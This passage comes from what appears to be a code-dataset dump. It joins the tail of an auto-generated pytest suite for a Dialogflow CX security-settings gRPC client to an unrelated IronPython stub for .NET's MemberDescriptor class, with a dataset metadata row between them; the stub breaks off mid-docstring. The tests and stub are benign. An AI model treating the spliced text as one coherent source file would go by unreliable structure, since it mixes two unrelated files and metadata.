    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.delete_security_settings),
            '__call__') as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
        await client.delete_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request
    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert (
        'x-goog-request-params',
        'name=name/value',
    ) in kw['metadata']
def test_delete_security_settings_flattened():
    """Flattened keyword arguments must be folded into the request message."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.delete_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call.
        call.return_value = None
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.delete_security_settings(
            name='name_value',
        )
        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0].name == 'name_value'
def test_delete_security_settings_flattened_error():
    """Mixing a request object with flattened arguments must raise."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # A request message plus flattened keyword fields is ambiguous, so the
    # client rejects the combination with ValueError.
    request = security_settings.DeleteSecuritySettingsRequest()
    with pytest.raises(ValueError):
        client.delete_security_settings(
            request,
            name='name_value',
        )
@pytest.mark.asyncio
async def test_delete_security_settings_flattened_async():
    """Flattened kwargs must be folded into the request (async client)."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.delete_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call.  Only the
        # awaitable FakeUnaryUnaryCall wrapper is needed; the previous bare
        # `None` assignment was immediately overwritten (dead code).
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        response = await client.delete_security_settings(
            name='name_value',
        )
        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0].name == 'name_value'
@pytest.mark.asyncio
async def test_delete_security_settings_flattened_error_async():
    """Mixing a request object with flattened arguments must raise (async)."""
    async_client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # A request message plus flattened keyword fields is ambiguous.
    request = security_settings.DeleteSecuritySettingsRequest()
    with pytest.raises(ValueError):
        await async_client.delete_security_settings(
            request,
            name='name_value',
        )
def test_credentials_transport_error():
    """The client ctor must reject a transport combined with credentials,
    a credentials file, or scopes — the transport already carries those."""
    # It is an error to provide credentials and a transport instance.
    transport = transports.SecuritySettingsServiceGrpcTransport(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    with pytest.raises(ValueError):
        client = SecuritySettingsServiceClient(
            credentials=ga_credentials.AnonymousCredentials(),
            transport=transport,
        )
    # It is an error to provide a credentials file and a transport instance.
    transport = transports.SecuritySettingsServiceGrpcTransport(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    with pytest.raises(ValueError):
        client = SecuritySettingsServiceClient(
            client_options={"credentials_file": "credentials.json"},
            transport=transport,
        )
    # It is an error to provide scopes and a transport instance.
    transport = transports.SecuritySettingsServiceGrpcTransport(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    with pytest.raises(ValueError):
        client = SecuritySettingsServiceClient(
            client_options={"scopes": ["1", "2"]},
            transport=transport,
        )
def test_transport_instance():
    """A client accepts and adopts a pre-built transport instance."""
    custom_transport = transports.SecuritySettingsServiceGrpcTransport(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    client = SecuritySettingsServiceClient(transport=custom_transport)
    # The client must hold the exact object it was given, not a copy.
    assert client.transport is custom_transport
def test_transport_get_channel():
    """Both sync and async gRPC transports expose a usable channel."""
    for transport_cls in (
        transports.SecuritySettingsServiceGrpcTransport,
        transports.SecuritySettingsServiceGrpcAsyncIOTransport,
    ):
        transport = transport_cls(
            credentials=ga_credentials.AnonymousCredentials(),
        )
        # grpc_channel must be truthy (a live channel object).
        assert transport.grpc_channel
@pytest.mark.parametrize("transport_class", [
    transports.SecuritySettingsServiceGrpcTransport,
    transports.SecuritySettingsServiceGrpcAsyncIOTransport,
])
def test_transport_adc(transport_class):
    """With no explicit credentials, the transport falls back to ADC."""
    with mock.patch.object(google.auth, 'default') as mocked_default:
        mocked_default.return_value = (ga_credentials.AnonymousCredentials(), None)
        transport_class()
        # Application Default Credentials must have been consulted once.
        mocked_default.assert_called_once()
def test_transport_grpc_default():
    """With no transport argument, the client defaults to synchronous gRPC."""
    default_client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # The synchronous gRPC transport is the documented default.
    assert isinstance(
        default_client.transport,
        transports.SecuritySettingsServiceGrpcTransport,
    )
def test_security_settings_service_base_transport_error():
    """Supplying both credentials and credentials_file must raise."""
    # The two credential sources are mutually exclusive; the base transport
    # rejects the combination before doing any work.
    with pytest.raises(core_exceptions.DuplicateCredentialArgs):
        transports.SecuritySettingsServiceTransport(
            credentials=ga_credentials.AnonymousCredentials(),
            credentials_file="credentials.json",
        )
def test_security_settings_service_base_transport():
    """Every RPC method on the abstract base transport raises
    NotImplementedError, as does close()."""
    # Instantiate the base transport.
    with mock.patch('google.cloud.dialogflowcx_v3beta1.services.security_settings_service.transports.SecuritySettingsServiceTransport.__init__') as Transport:
        Transport.return_value = None
        transport = transports.SecuritySettingsServiceTransport(
            credentials=ga_credentials.AnonymousCredentials(),
        )
    # Every method on the transport should just blindly
    # raise NotImplementedError.
    methods = (
        'create_security_settings',
        'get_security_settings',
        'update_security_settings',
        'list_security_settings',
        'delete_security_settings',
    )
    for method in methods:
        with pytest.raises(NotImplementedError):
            getattr(transport, method)(request=object())
    with pytest.raises(NotImplementedError):
        transport.close()
@requires_google_auth_gte_1_25_0
def test_security_settings_service_base_transport_with_credentials_file():
    """A credentials file must be loaded with default_scopes (google-auth
    >= 1.25.0 keyword) and the given quota project."""
    # Instantiate the base transport with a credentials file
    with mock.patch.object(google.auth, 'load_credentials_from_file', autospec=True) as load_creds, mock.patch('google.cloud.dialogflowcx_v3beta1.services.security_settings_service.transports.SecuritySettingsServiceTransport._prep_wrapped_messages') as Transport:
        Transport.return_value = None
        load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
        transport = transports.SecuritySettingsServiceTransport(
            credentials_file="credentials.json",
            quota_project_id="octopus",
        )
        load_creds.assert_called_once_with("credentials.json",
            scopes=None,
            default_scopes=(
                'https://www.googleapis.com/auth/cloud-platform',
                'https://www.googleapis.com/auth/dialogflow',
            ),
            quota_project_id="octopus",
        )
@requires_google_auth_lt_1_25_0
def test_security_settings_service_base_transport_with_credentials_file_old_google_auth():
    """Pre-1.25.0 google-auth has no default_scopes keyword; the scopes are
    passed via the plain scopes argument instead."""
    # Instantiate the base transport with a credentials file
    with mock.patch.object(google.auth, 'load_credentials_from_file', autospec=True) as load_creds, mock.patch('google.cloud.dialogflowcx_v3beta1.services.security_settings_service.transports.SecuritySettingsServiceTransport._prep_wrapped_messages') as Transport:
        Transport.return_value = None
        load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
        transport = transports.SecuritySettingsServiceTransport(
            credentials_file="credentials.json",
            quota_project_id="octopus",
        )
        load_creds.assert_called_once_with("credentials.json", scopes=(
            'https://www.googleapis.com/auth/cloud-platform',
            'https://www.googleapis.com/auth/dialogflow',
        ),
            quota_project_id="octopus",
        )
def test_security_settings_service_base_transport_with_adc():
    """With neither credentials nor credentials_file, the base transport
    falls back to Application Default Credentials."""
    # Test the default credentials are used if credentials and credentials_file are None.
    with mock.patch.object(google.auth, 'default', autospec=True) as adc, mock.patch('google.cloud.dialogflowcx_v3beta1.services.security_settings_service.transports.SecuritySettingsServiceTransport._prep_wrapped_messages') as Transport:
        Transport.return_value = None
        adc.return_value = (ga_credentials.AnonymousCredentials(), None)
        transport = transports.SecuritySettingsServiceTransport()
        adc.assert_called_once()
@requires_google_auth_gte_1_25_0
def test_security_settings_service_auth_adc():
    """The client consults ADC with the service's default_scopes
    (google-auth >= 1.25.0 keyword)."""
    # If no credentials are provided, we should use ADC credentials.
    with mock.patch.object(google.auth, 'default', autospec=True) as adc:
        adc.return_value = (ga_credentials.AnonymousCredentials(), None)
        SecuritySettingsServiceClient()
        adc.assert_called_once_with(
            scopes=None,
            default_scopes=(
                'https://www.googleapis.com/auth/cloud-platform',
                'https://www.googleapis.com/auth/dialogflow',
            ),
            quota_project_id=None,
        )
@requires_google_auth_lt_1_25_0
def test_security_settings_service_auth_adc_old_google_auth():
    """Pre-1.25.0 google-auth: scopes are passed positionally as `scopes`."""
    # If no credentials are provided, we should use ADC credentials.
    with mock.patch.object(google.auth, 'default', autospec=True) as adc:
        adc.return_value = (ga_credentials.AnonymousCredentials(), None)
        SecuritySettingsServiceClient()
        adc.assert_called_once_with(
            scopes=( 'https://www.googleapis.com/auth/cloud-platform', 'https://www.googleapis.com/auth/dialogflow',),
            quota_project_id=None,
        )
@pytest.mark.parametrize(
    "transport_class",
    [
        transports.SecuritySettingsServiceGrpcTransport,
        transports.SecuritySettingsServiceGrpcAsyncIOTransport,
    ],
)
@requires_google_auth_gte_1_25_0
def test_security_settings_service_transport_auth_adc(transport_class):
    """Both gRPC transports consult ADC with user scopes plus the service's
    default_scopes (google-auth >= 1.25.0 keyword)."""
    # If credentials and host are not provided, the transport class should use
    # ADC credentials.
    with mock.patch.object(google.auth, 'default', autospec=True) as adc:
        adc.return_value = (ga_credentials.AnonymousCredentials(), None)
        transport_class(quota_project_id="octopus", scopes=["1", "2"])
        adc.assert_called_once_with(
            scopes=["1", "2"],
            default_scopes=( 'https://www.googleapis.com/auth/cloud-platform', 'https://www.googleapis.com/auth/dialogflow',),
            quota_project_id="octopus",
        )
@pytest.mark.parametrize(
    "transport_class",
    [
        transports.SecuritySettingsServiceGrpcTransport,
        transports.SecuritySettingsServiceGrpcAsyncIOTransport,
    ],
)
@requires_google_auth_lt_1_25_0
def test_security_settings_service_transport_auth_adc_old_google_auth(transport_class):
    """Pre-1.25.0 google-auth: both gRPC transports pass the service scopes
    via the plain scopes argument."""
    # If credentials and host are not provided, the transport class should use
    # ADC credentials.
    with mock.patch.object(google.auth, "default", autospec=True) as adc:
        adc.return_value = (ga_credentials.AnonymousCredentials(), None)
        transport_class(quota_project_id="octopus")
        adc.assert_called_once_with(scopes=(
            'https://www.googleapis.com/auth/cloud-platform',
            'https://www.googleapis.com/auth/dialogflow',
        ),
            quota_project_id="octopus",
        )
@pytest.mark.parametrize(
    "transport_class,grpc_helpers",
    [
        (transports.SecuritySettingsServiceGrpcTransport, grpc_helpers),
        (transports.SecuritySettingsServiceGrpcAsyncIOTransport, grpc_helpers_async)
    ],
)
def test_security_settings_service_transport_create_channel(transport_class, grpc_helpers):
    """The transport must forward host, ADC credentials, scopes and the
    unlimited-message-size options to grpc_helpers.create_channel."""
    # If credentials and host are not provided, the transport class should use
    # ADC credentials.
    with mock.patch.object(google.auth, "default", autospec=True) as adc, mock.patch.object(
        grpc_helpers, "create_channel", autospec=True
    ) as create_channel:
        creds = ga_credentials.AnonymousCredentials()
        adc.return_value = (creds, None)
        transport_class(
            quota_project_id="octopus",
            scopes=["1", "2"]
        )
        create_channel.assert_called_with(
            "dialogflow.googleapis.com:443",
            credentials=creds,
            credentials_file=None,
            quota_project_id="octopus",
            default_scopes=(
                'https://www.googleapis.com/auth/cloud-platform',
                'https://www.googleapis.com/auth/dialogflow',
            ),
            scopes=["1", "2"],
            default_host="dialogflow.googleapis.com",
            ssl_credentials=None,
            options=[
                ("grpc.max_send_message_length", -1),
                ("grpc.max_receive_message_length", -1),
            ],
        )
@pytest.mark.parametrize("transport_class", [transports.SecuritySettingsServiceGrpcTransport, transports.SecuritySettingsServiceGrpcAsyncIOTransport])
def test_security_settings_service_grpc_transport_client_cert_source_for_mtls(
    transport_class
):
    """mTLS channel setup: explicit ssl_channel_credentials win; otherwise
    client_cert_source_for_mtls is invoked to build them."""
    cred = ga_credentials.AnonymousCredentials()
    # Check ssl_channel_credentials is used if provided.
    with mock.patch.object(transport_class, "create_channel") as mock_create_channel:
        mock_ssl_channel_creds = mock.Mock()
        transport_class(
            host="squid.clam.whelk",
            credentials=cred,
            ssl_channel_credentials=mock_ssl_channel_creds
        )
        mock_create_channel.assert_called_once_with(
            "squid.clam.whelk:443",
            credentials=cred,
            credentials_file=None,
            scopes=None,
            ssl_credentials=mock_ssl_channel_creds,
            quota_project_id=None,
            options=[
                ("grpc.max_send_message_length", -1),
                ("grpc.max_receive_message_length", -1),
            ],
        )
    # Check if ssl_channel_credentials is not provided, then client_cert_source_for_mtls
    # is used.
    with mock.patch.object(transport_class, "create_channel", return_value=mock.Mock()):
        with mock.patch("grpc.ssl_channel_credentials") as mock_ssl_cred:
            transport_class(
                credentials=cred,
                client_cert_source_for_mtls=client_cert_source_callback
            )
            expected_cert, expected_key = client_cert_source_callback()
            mock_ssl_cred.assert_called_once_with(
                certificate_chain=expected_cert,
                private_key=expected_key
            )
def test_security_settings_service_host_no_port():
    """An api_endpoint without a port gets the default :443 appended."""
    options = client_options.ClientOptions(api_endpoint='dialogflow.googleapis.com')
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
        client_options=options,
    )
    assert client.transport._host == 'dialogflow.googleapis.com:443'
def test_security_settings_service_host_with_port():
    """An api_endpoint with an explicit port is used verbatim."""
    options = client_options.ClientOptions(api_endpoint='dialogflow.googleapis.com:8000')
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
        client_options=options,
    )
    assert client.transport._host == 'dialogflow.googleapis.com:8000'
def test_security_settings_service_grpc_transport_channel():
    """A caller-supplied channel is adopted verbatim by the sync transport."""
    channel = grpc.secure_channel('http://localhost/', grpc.local_channel_credentials())
    # Check that channel is used if provided.
    transport = transports.SecuritySettingsServiceGrpcTransport(
        host="squid.clam.whelk",
        channel=channel,
    )
    assert transport.grpc_channel == channel
    assert transport._host == "squid.clam.whelk:443"
    # PEP 8: compare to None with identity, not equality (`== None` fixed).
    assert transport._ssl_channel_credentials is None
def test_security_settings_service_grpc_asyncio_transport_channel():
    """A caller-supplied channel is adopted verbatim by the async transport."""
    channel = aio.secure_channel('http://localhost/', grpc.local_channel_credentials())
    # Check that channel is used if provided.
    transport = transports.SecuritySettingsServiceGrpcAsyncIOTransport(
        host="squid.clam.whelk",
        channel=channel,
    )
    assert transport.grpc_channel == channel
    assert transport._host == "squid.clam.whelk:443"
    # PEP 8: compare to None with identity, not equality (`== None` fixed).
    assert transport._ssl_channel_credentials is None
# Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are
# removed from grpc/grpc_asyncio transport constructor.
@pytest.mark.parametrize("transport_class", [transports.SecuritySettingsServiceGrpcTransport, transports.SecuritySettingsServiceGrpcAsyncIOTransport])
def test_security_settings_service_transport_channel_mtls_with_client_cert_source(
    transport_class
):
    """Deprecated api_mtls_endpoint + client_cert_source path: the cert/key
    from the callback must flow into grpc.ssl_channel_credentials and the
    resulting credentials into create_channel (with a DeprecationWarning)."""
    with mock.patch("grpc.ssl_channel_credentials", autospec=True) as grpc_ssl_channel_cred:
        with mock.patch.object(transport_class, "create_channel") as grpc_create_channel:
            mock_ssl_cred = mock.Mock()
            grpc_ssl_channel_cred.return_value = mock_ssl_cred
            mock_grpc_channel = mock.Mock()
            grpc_create_channel.return_value = mock_grpc_channel
            cred = ga_credentials.AnonymousCredentials()
            with pytest.warns(DeprecationWarning):
                with mock.patch.object(google.auth, 'default') as adc:
                    adc.return_value = (cred, None)
                    transport = transport_class(
                        host="squid.clam.whelk",
                        api_mtls_endpoint="mtls.squid.clam.whelk",
                        client_cert_source=client_cert_source_callback,
                    )
                    adc.assert_called_once()
            grpc_ssl_channel_cred.assert_called_once_with(
                certificate_chain=b"cert bytes", private_key=b"key bytes"
            )
            grpc_create_channel.assert_called_once_with(
                "mtls.squid.clam.whelk:443",
                credentials=cred,
                credentials_file=None,
                scopes=None,
                ssl_credentials=mock_ssl_cred,
                quota_project_id=None,
                options=[
                    ("grpc.max_send_message_length", -1),
                    ("grpc.max_receive_message_length", -1),
                ],
            )
            assert transport.grpc_channel == mock_grpc_channel
            assert transport._ssl_channel_credentials == mock_ssl_cred
# Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are
# removed from grpc/grpc_asyncio transport constructor.
@pytest.mark.parametrize("transport_class", [transports.SecuritySettingsServiceGrpcTransport, transports.SecuritySettingsServiceGrpcAsyncIOTransport])
def test_security_settings_service_transport_channel_mtls_with_adc(
    transport_class
):
    """Deprecated api_mtls_endpoint without a cert source: SSL credentials
    come from google.auth.transport.grpc.SslCredentials (ADC mTLS path)."""
    mock_ssl_cred = mock.Mock()
    with mock.patch.multiple(
        "google.auth.transport.grpc.SslCredentials",
        __init__=mock.Mock(return_value=None),
        ssl_credentials=mock.PropertyMock(return_value=mock_ssl_cred),
    ):
        with mock.patch.object(transport_class, "create_channel") as grpc_create_channel:
            mock_grpc_channel = mock.Mock()
            grpc_create_channel.return_value = mock_grpc_channel
            mock_cred = mock.Mock()
            with pytest.warns(DeprecationWarning):
                transport = transport_class(
                    host="squid.clam.whelk",
                    credentials=mock_cred,
                    api_mtls_endpoint="mtls.squid.clam.whelk",
                    client_cert_source=None,
                )
            grpc_create_channel.assert_called_once_with(
                "mtls.squid.clam.whelk:443",
                credentials=mock_cred,
                credentials_file=None,
                scopes=None,
                ssl_credentials=mock_ssl_cred,
                quota_project_id=None,
                options=[
                    ("grpc.max_send_message_length", -1),
                    ("grpc.max_receive_message_length", -1),
                ],
            )
            assert transport.grpc_channel == mock_grpc_channel
def test_deidentify_template_path():
    """deidentify_template_path() renders the documented resource-name template."""
    organization, location, deidentify_template = "squid", "clam", "whelk"
    template = "organizations/{organization}/locations/{location}/deidentifyTemplates/{deidentify_template}"
    want = template.format(organization=organization, location=location, deidentify_template=deidentify_template)
    got = SecuritySettingsServiceClient.deidentify_template_path(organization, location, deidentify_template)
    assert got == want
def test_parse_deidentify_template_path():
    """parse_deidentify_template_path() inverts deidentify_template_path()."""
    components = dict(
        organization="octopus",
        location="oyster",
        deidentify_template="nudibranch",
    )
    path = SecuritySettingsServiceClient.deidentify_template_path(**components)
    # Round-trip: parsing the rendered path recovers the original components.
    assert SecuritySettingsServiceClient.parse_deidentify_template_path(path) == components
def test_inspect_template_path():
    """inspect_template_path() renders the documented resource-name template."""
    organization, location, inspect_template = "cuttlefish", "mussel", "winkle"
    template = "organizations/{organization}/locations/{location}/inspectTemplates/{inspect_template}"
    want = template.format(organization=organization, location=location, inspect_template=inspect_template)
    got = SecuritySettingsServiceClient.inspect_template_path(organization, location, inspect_template)
    assert got == want
def test_parse_inspect_template_path():
    """parse_inspect_template_path() inverts inspect_template_path()."""
    components = dict(
        organization="nautilus",
        location="scallop",
        inspect_template="abalone",
    )
    path = SecuritySettingsServiceClient.inspect_template_path(**components)
    # Round-trip: parsing the rendered path recovers the original components.
    assert SecuritySettingsServiceClient.parse_inspect_template_path(path) == components
def test_security_settings_path():
    """security_settings_path() renders the documented resource-name template."""
    project, location, security_settings = "squid", "clam", "whelk"
    template = "projects/{project}/locations/{location}/securitySettings/{security_settings}"
    want = template.format(project=project, location=location, security_settings=security_settings)
    got = SecuritySettingsServiceClient.security_settings_path(project, location, security_settings)
    assert got == want
def test_parse_security_settings_path():
    """parse_security_settings_path() inverts security_settings_path()."""
    components = dict(
        project="octopus",
        location="oyster",
        security_settings="nudibranch",
    )
    path = SecuritySettingsServiceClient.security_settings_path(**components)
    # Round-trip: parsing the rendered path recovers the original components.
    assert SecuritySettingsServiceClient.parse_security_settings_path(path) == components
def test_common_billing_account_path():
    """common_billing_account_path() renders the billing-account template."""
    billing_account = "cuttlefish"
    template = "billingAccounts/{billing_account}"
    want = template.format(billing_account=billing_account)
    got = SecuritySettingsServiceClient.common_billing_account_path(billing_account)
    assert got == want
def test_parse_common_billing_account_path():
    """parse_common_billing_account_path() inverts common_billing_account_path()."""
    components = dict(billing_account="mussel")
    path = SecuritySettingsServiceClient.common_billing_account_path(**components)
    # Round-trip: parsing the rendered path recovers the original components.
    assert SecuritySettingsServiceClient.parse_common_billing_account_path(path) == components
def test_common_folder_path():
    """common_folder_path() renders the folder template."""
    folder = "winkle"
    template = "folders/{folder}"
    want = template.format(folder=folder)
    got = SecuritySettingsServiceClient.common_folder_path(folder)
    assert got == want
def test_parse_common_folder_path():
    """parse_common_folder_path() inverts common_folder_path()."""
    components = dict(folder="nautilus")
    path = SecuritySettingsServiceClient.common_folder_path(**components)
    # Round-trip: parsing the rendered path recovers the original components.
    assert SecuritySettingsServiceClient.parse_common_folder_path(path) == components
def test_common_organization_path():
    """common_organization_path() renders the organization template."""
    organization = "scallop"
    template = "organizations/{organization}"
    want = template.format(organization=organization)
    got = SecuritySettingsServiceClient.common_organization_path(organization)
    assert got == want
def test_parse_common_organization_path():
    """parse_common_organization_path() inverts common_organization_path()."""
    components = dict(organization="abalone")
    path = SecuritySettingsServiceClient.common_organization_path(**components)
    # Round-trip: parsing the rendered path recovers the original components.
    assert SecuritySettingsServiceClient.parse_common_organization_path(path) == components
def test_common_project_path():
    """common_project_path() renders the project template."""
    project = "squid"
    template = "projects/{project}"
    want = template.format(project=project)
    got = SecuritySettingsServiceClient.common_project_path(project)
    assert got == want
def test_parse_common_project_path():
    """parse_common_project_path() inverts common_project_path()."""
    components = dict(project="clam")
    path = SecuritySettingsServiceClient.common_project_path(**components)
    # Round-trip: parsing the rendered path recovers the original components.
    assert SecuritySettingsServiceClient.parse_common_project_path(path) == components
def test_common_location_path():
    """common_location_path() renders the project/location template."""
    project, location = "whelk", "octopus"
    template = "projects/{project}/locations/{location}"
    want = template.format(project=project, location=location)
    got = SecuritySettingsServiceClient.common_location_path(project, location)
    assert got == want
def test_parse_common_location_path():
    """parse_common_location_path() inverts common_location_path()."""
    components = dict(
        project="oyster",
        location="nudibranch",
    )
    path = SecuritySettingsServiceClient.common_location_path(**components)
    # Round-trip: parsing the rendered path recovers the original components.
    assert SecuritySettingsServiceClient.parse_common_location_path(path) == components
def test_client_withDEFAULT_CLIENT_INFO():
    """A caller-supplied ClientInfo must reach _prep_wrapped_messages.

    Exercised two ways: constructing the client directly, and constructing
    the transport class returned by get_transport_class().
    """
    client_info = gapic_v1.client_info.ClientInfo()
    # Path 1: client constructor forwards client_info to the transport.
    with mock.patch.object(transports.SecuritySettingsServiceTransport, '_prep_wrapped_messages') as prep:
        client = SecuritySettingsServiceClient(
            credentials=ga_credentials.AnonymousCredentials(),
            client_info=client_info,
        )
        prep.assert_called_once_with(client_info)
    # Path 2: constructing the transport class directly does the same.
    with mock.patch.object(transports.SecuritySettingsServiceTransport, '_prep_wrapped_messages') as prep:
        transport_class = SecuritySettingsServiceClient.get_transport_class()
        transport = transport_class(
            credentials=ga_credentials.AnonymousCredentials(),
            client_info=client_info,
        )
        prep.assert_called_once_with(client_info)
@pytest.mark.asyncio
async def test_transport_close_async():
    """`async with client` must close the gRPC channel exactly once, on exit."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
        transport="grpc_asyncio",
    )
    with mock.patch.object(type(getattr(client.transport, "grpc_channel")), "close") as close:
        async with client:
            # Still inside the context: the channel must not be closed yet.
            close.assert_not_called()
        close.assert_called_once()
def test_transport_close():
    """`with client` must close each sync transport's channel exactly once, on exit."""
    # NOTE(review): this local dict shadows the module-level `transports`
    # import for the rest of the function; maps transport name -> the private
    # channel attribute whose close() is observed.
    transports = {
        "grpc": "_grpc_channel",
    }
    for transport, close_name in transports.items():
        client = SecuritySettingsServiceClient(
            credentials=ga_credentials.AnonymousCredentials(),
            transport=transport
        )
        with mock.patch.object(type(getattr(client.transport, close_name)), "close") as close:
            with client:
                # Inside the context the channel must still be open.
                close.assert_not_called()
            close.assert_called_once()
def test_client_ctx():
    """Client __enter__/__exit__ must delegate close() to its transport."""
    # NOTE(review): this local list shadows the module-level `transports`
    # import for the rest of the function.
    transports = [
        'grpc',
    ]
    for transport in transports:
        client = SecuritySettingsServiceClient(
            credentials=ga_credentials.AnonymousCredentials(),
            transport=transport
        )
        # Test client calls underlying transport.
        with mock.patch.object(type(client.transport), "close") as close:
            close.assert_not_called()
            with client:
                pass
            close.assert_called()
| true | true |
1c3c7daceee235a0960c9e3e1d5f8a436e75eeeb | 6,587 | py | Python | release/stubs.min/System/ComponentModel/__init___parts/MemberDescriptor.py | htlcnn/ironpython-stubs | 780d829e2104b2789d5f4d6f32b0ec9f2930ca03 | [
"MIT"
] | 182 | 2017-06-27T02:26:15.000Z | 2022-03-30T18:53:43.000Z | release/stubs.min/System/ComponentModel/__init___parts/MemberDescriptor.py | htlcnn/ironpython-stubs | 780d829e2104b2789d5f4d6f32b0ec9f2930ca03 | [
"MIT"
] | 28 | 2017-06-27T13:38:23.000Z | 2022-03-15T11:19:44.000Z | release/stubs.min/System/ComponentModel/__init___parts/MemberDescriptor.py | htlcnn/ironpython-stubs | 780d829e2104b2789d5f4d6f32b0ec9f2930ca03 | [
"MIT"
] | 67 | 2017-06-28T09:43:59.000Z | 2022-03-20T21:17:10.000Z | class MemberDescriptor(object):
""" Represents a class member,such as a property or event. This is an abstract base class. """
def CreateAttributeCollection(self,*args):
"""
CreateAttributeCollection(self: MemberDescriptor) -> AttributeCollection
Creates a collection of attributes using the array of attributes passed to the constructor.
Returns: A new System.ComponentModel.AttributeCollection that contains the
System.ComponentModel.MemberDescriptor.AttributeArray attributes.
"""
pass
def Equals(self,obj):
"""
Equals(self: MemberDescriptor,obj: object) -> bool
Compares this instance to the given object to see if they are equivalent.
obj: The object to compare to the current instance.
Returns: true if equivalent; otherwise,false.
"""
pass
def FillAttributes(self,*args):
"""
FillAttributes(self: MemberDescriptor,attributeList: IList)
When overridden in a derived class,adds the attributes of the inheriting class to the specified
list of attributes in the parent class.
attributeList: An System.Collections.IList that lists the attributes in the parent class. Initially,this is
empty.
"""
pass
def FindMethod(self,*args):
"""
FindMethod(componentClass: Type,name: str,args: Array[Type],returnType: Type,publicOnly: bool) -> MethodInfo
Finds the given method through reflection,with an option to search only public methods.
componentClass: The component that contains the method.
name: The name of the method to find.
args: An array of parameters for the method,used to choose between overloaded methods.
returnType: The type to return for the method.
publicOnly: Whether to restrict search to public methods.
Returns: A System.Reflection.MethodInfo that represents the method,or null if the method is not found.
FindMethod(componentClass: Type,name: str,args: Array[Type],returnType: Type) -> MethodInfo
Finds the given method through reflection,searching only for public methods.
componentClass: The component that contains the method.
name: The name of the method to find.
args: An array of parameters for the method,used to choose between overloaded methods.
returnType: The type to return for the method.
Returns: A System.Reflection.MethodInfo that represents the method,or null if the method is not found.
"""
pass
def GetHashCode(self):
"""
GetHashCode(self: MemberDescriptor) -> int
Returns the hash code for this instance.
Returns: A hash code for the current System.ComponentModel.MemberDescriptor.
"""
pass
def GetInvocationTarget(self,*args):
"""
GetInvocationTarget(self: MemberDescriptor,type: Type,instance: object) -> object
Retrieves the object that should be used during invocation of members.
type: The System.Type of the invocation target.
instance: The potential invocation target.
Returns: The object to be used during member invocations.
"""
pass
def GetInvokee(self,*args):
"""
GetInvokee(componentClass: Type,component: object) -> object
Gets the component on which to invoke a method.
componentClass: A System.Type representing the type of component this System.ComponentModel.MemberDescriptor is
bound to. For example,if this System.ComponentModel.MemberDescriptor describes a property,this
parameter should be the class that the property is declared on.
component: An instance of the object to call.
Returns: An instance of the component to invoke. This method returns a visual designer when the property
is attached to a visual designer.
"""
pass
def GetSite(self,*args):
"""
GetSite(component: object) -> ISite
Gets a component site for the given component.
component: The component for which you want to find a site.
Returns: The site of the component,or null if a site does not exist.
"""
pass
def __eq__(self,*args):
""" x.__eq__(y) <==> x==y """
pass
@staticmethod
def __new__(self,*args): #cannot find CLR constructor
"""
__new__(cls: type,name: str)
__new__(cls: type,name: str,attributes: Array[Attribute])
__new__(cls: type,descr: MemberDescriptor)
__new__(cls: type,oldMemberDescriptor: MemberDescriptor,newAttributes: Array[Attribute])
"""
pass
def __ne__(self,*args):
pass
AttributeArray=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets an array of attributes.
"""
Attributes=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the collection of attributes for this member.
Get: Attributes(self: MemberDescriptor) -> AttributeCollection
"""
Category=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the name of the category to which the member belongs,as specified in the System.ComponentModel.CategoryAttribute.
Get: Category(self: MemberDescriptor) -> str
"""
Description=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the description of the member,as specified in the System.ComponentModel.DescriptionAttribute.
Get: Description(self: MemberDescriptor) -> str
"""
DesignTimeOnly=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets whether this member should be set only at design time,as specified in the System.ComponentModel.DesignOnlyAttribute.
Get: DesignTimeOnly(self: MemberDescriptor) -> bool
"""
DisplayName=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the name that can be displayed in a window,such as a Properties window.
Get: DisplayName(self: MemberDescriptor) -> str
"""
IsBrowsable=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether the member is browsable,as specified in the System.ComponentModel.BrowsableAttribute.
Get: IsBrowsable(self: MemberDescriptor) -> bool
"""
Name=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the name of the member.
